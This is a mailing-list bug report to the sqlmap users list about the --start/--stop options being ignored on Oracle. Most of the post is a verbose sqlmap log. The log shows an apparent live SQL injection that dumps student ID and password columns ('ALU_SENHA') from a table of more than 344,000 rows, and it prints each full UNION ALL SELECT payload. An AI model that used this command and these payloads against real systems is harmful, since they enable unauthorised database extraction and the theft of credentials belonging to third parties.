[sqlmap-users] Bug(?) with --start/stop in oracle(maybe others)

[David G. <sk...@gm...>]

Syntax that had problems:

$ ./sqlmap.py -u "http://www.vuln.com/vuln.asp?a=000408092&b=" -p a
--union-use -T ALU_ALUNOS --dump -C "ALU_RA,ALU_SENHA" --start 0 --stop 4 -v
2

    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 22:52:50

[22:52:50] [DEBUG] initializing the configuration
[22:52:50] [DEBUG] initializing the knowledge base
[22:52:50] [DEBUG] cleaning up configuration parameters
[22:52:50] [DEBUG] setting the HTTP timeout
[22:52:50] [DEBUG] setting the HTTP method to GET
[22:52:50] [DEBUG] creating HTTP requests opener object
[22:52:50] [DEBUG] parsing XML queries file
[22:52:50] [INFO] using '/path/session' as session file
[22:52:50] [INFO] resuming injection point 'GET' from session file
[22:52:50] [INFO] resuming injection parameter 'a' from session file
[22:52:50] [INFO] resuming injection type 'stringsingle' from session file
[22:52:50] [INFO] resuming 0 number of parenthesis from session file
[22:52:50] [INFO] resuming back-end DBMS 'oracle' from session file
[22:52:50] [INFO] resuming union comment '--' from session file
[22:52:50] [INFO] resuming union count 15 from session file
[22:52:50] [INFO] resuming union position 1 from session file
[22:52:50] [INFO] resuming union false condition 1 from session file
[22:52:50] [INFO] testing connection to the target url
[22:52:50] [DEBUG] got HTTP error code: 500
[22:52:50] [WARNING] the testable parameter 'a' you provided is not into the
Cookie
[22:52:50] [INFO] testing for parenthesis on injectable parameter
[22:52:50] [DEBUG] skipping test for MySQL
[22:52:50] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle

[22:52:50] [WARNING] on Oracle it is only possible to enumerate if you
provide a TABLESPACE_NAME as database name. sqlmap is going to use 'USERS'
as database name
[22:52:50] [INFO] fetching columns 'ALU_RA, ALU_SENHA' entries for table
'ALU_ALUNOS' on database 'USERS'
[22:52:50] [INFO] the SQL query provided has more than a field. sqlmap will
now unpack it into distinct queries to be able to retrieve the output even
if we are in front of a partial inband sql injection
[22:52:50] [INFO] read from file '/path': 344305
[22:52:50] [DEBUG] query: ' UNION ALL SELECT NULL,
CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(COUNT(ALU_RA)
AS VARCHAR(4000)),
CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM
ALU_ALUNOS-- AND 'RFOj'='RFOj
[22:52:51] [DEBUG] performed 1 queries in 0 seconds
[22:52:51] [INFO] the SQL query provided returns 344305 entries
[22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL,
CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS
VARCHAR(4000)),
CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA
AS VARCHAR(4000)),
CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM
(SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=1--
AND 'qGli'='qGli
[22:52:51] [DEBUG] performed 2 queries in 0 seconds
[22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL,
CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS
VARCHAR(4000)),
CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA
AS VARCHAR(4000)),
CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM
(SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=2--
AND 'EXyf'='EXyf
[22:52:53] [DEBUG] performed 3 queries in 1 seconds
[22:52:53] [DEBUG] query: ' UNION ALL SELECT NULL,
CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS
VARCHAR(4000)),
CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA
AS VARCHAR(4000)),
CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM
(SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=3--
AND 'CLyw'='CLyw
[22:52:56] [DEBUG] performed 4 queries in 2 seconds
[22:52:56] [DEBUG] query: ' UNION ALL SELECT NULL,
CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS
VARCHAR(4000)),
CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA
AS VARCHAR(4000)),
CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM
(SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=4--
AND 'nHQn'='nHQn
[22:52:57] [DEBUG] performed 5 queries in 0 seconds
[22:52:57] [DEBUG] query: ' UNION ALL SELECT NULL,
CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS
VARCHAR(4000)),
CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA
AS VARCHAR(4000)),
CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM
(SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=5--
AND 'iNmX'='iNmX
[22:52:58] [DEBUG] performed 6 queries in 1 seconds
[22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL,
CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS
VARCHAR(4000)),
CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA
AS VARCHAR(4000)),
CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM
(SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=6--
AND 'mVQM'='mVQM
[22:52:58] [DEBUG] performed 7 queries in 0 seconds
[22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL,
CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS
VARCHAR(4000)),
CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA
AS VARCHAR(4000)),
CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM
(SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=7--
AND 'FuqF'='FuqF
[22:52:59] [DEBUG] performed 8 queries in 0 seconds
[22:52:59] [DEBUG] query: ' UNION ALL SELECT NULL,
CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS
VARCHAR(4000)),
CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA
AS VARCHAR(4000)),
CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM
(SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=8--
AND 'utPd'='utPd
[22:53:01] [DEBUG] performed 9 queries in 2 seconds
[22:53:01] [DEBUG] query: ' UNION ALL SELECT NULL,
CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS
VARCHAR(4000)),
CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA
AS VARCHAR(4000)),
CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM
(SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=9--
AND 'ilBw'='ilBw
[22:53:03] [DEBUG] performed 10 queries in 2 seconds
[22:53:03] [DEBUG] query: ' UNION ALL SELECT NULL,
CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS
VARCHAR(4000)),
CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA
AS VARCHAR(4000)),
CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM
(SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=10--
AND 'YxAK'='YxAK
^C
[22:53:04] [ERROR] user aborted

[*] shutting down at: 22:53:04



As you can see, it will not stop consultation until the fourth, ignoring
parameters passed in ("--start" and "--stop").

I gave ctrl + c in the tenth query.

Am I doing something wrong or is it anyway?

$ svn info
Path: .
URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Repository Root: https://svn.sqlmap.org/sqlmap
Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
Revision: 1588
Node Kind: directory
Schedule: normal
Last Changed Author: inquisb
Last Changed Rev: 1588
Last Changed Date: 2010-04-23 13:34:20 -0300 (Fri, 23 Apr 2010)

-- 
David Gomes Guimarães